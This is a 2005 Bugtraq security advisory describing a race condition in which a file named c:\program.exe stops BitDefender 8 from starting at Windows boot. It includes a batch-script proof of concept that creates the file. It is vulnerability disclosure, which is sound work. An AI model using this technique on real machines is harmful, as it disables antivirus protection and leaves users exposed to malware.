Message-ID: <20050423030310.19443.qmail@www.securityfocus.com>
Date: 23 Apr 2005 03:03:10 -0000
From: SecuBox fRoGGz <unsecure@...teme.com>
To: bugtraq@...urityfocus.com
Subject: BitDefender 8 - Race condition vulnerability

-----------------------------
Product: BitDefender
Version: 8
Tested on: Windows 2000 SP4
Vulnerability: Race condition
-----------------------------

BACKGROUND
----------
BitDefender ensures the most advanced antivirus protection, as well as data
confidentiality, active content control and Internet filtering.
A powerful antivirus tool with features that best meet your security needs.
Source: www.bitdefender.com

VULNERABLE PRODUCTS
-------------------
BitDefender 8 Professional Plus
BitDefender 8 Standard Edition
Possibly others...

RACE CONDITION
--------------
At Windows startup, when a file named program.exe is found in c:\,
Windows shows an alert message. The message box controls are:
2 buttons -> "Rename" or "Ignore"
1 checkbox -> [X] Do not do this verification on startup.
(Sorry, I haven't got the exact English message)
At this moment, BitDefender can't start, so we have a session without virus protection.

PROOF OF CONCEPT
----------------
Open notepad.exe and paste this batch script:

@echo off
echo #-------------------------------------------------------#
echo [ SecuBox - Proof of Concept (04.12.2005) ]
echo #-------------------------------------------------------#
echo # This script just create the race condition. #
echo # It might be use by virus. #
echo # Now, reboot your computer and watch your BitDef ! #
echo #-------------------------------------------------------#
echo # Be carefull, for virus protection need another reboot #
echo # Closing your Windows session is not sufficient ! #
echo #-------------------------------------------------------#
echo BitDef PoC > c:\program.exe
pause
exit

EXPLOITATION
------------
Save this batch script as TEST.BAT and try it.

VENDOR STATUS
-------------
The vendor has been contacted, but there has been no reply ...

CREDITS
----------------------
SecuBox Labs - fRoGGz
unsecure@...teme.com
----------------------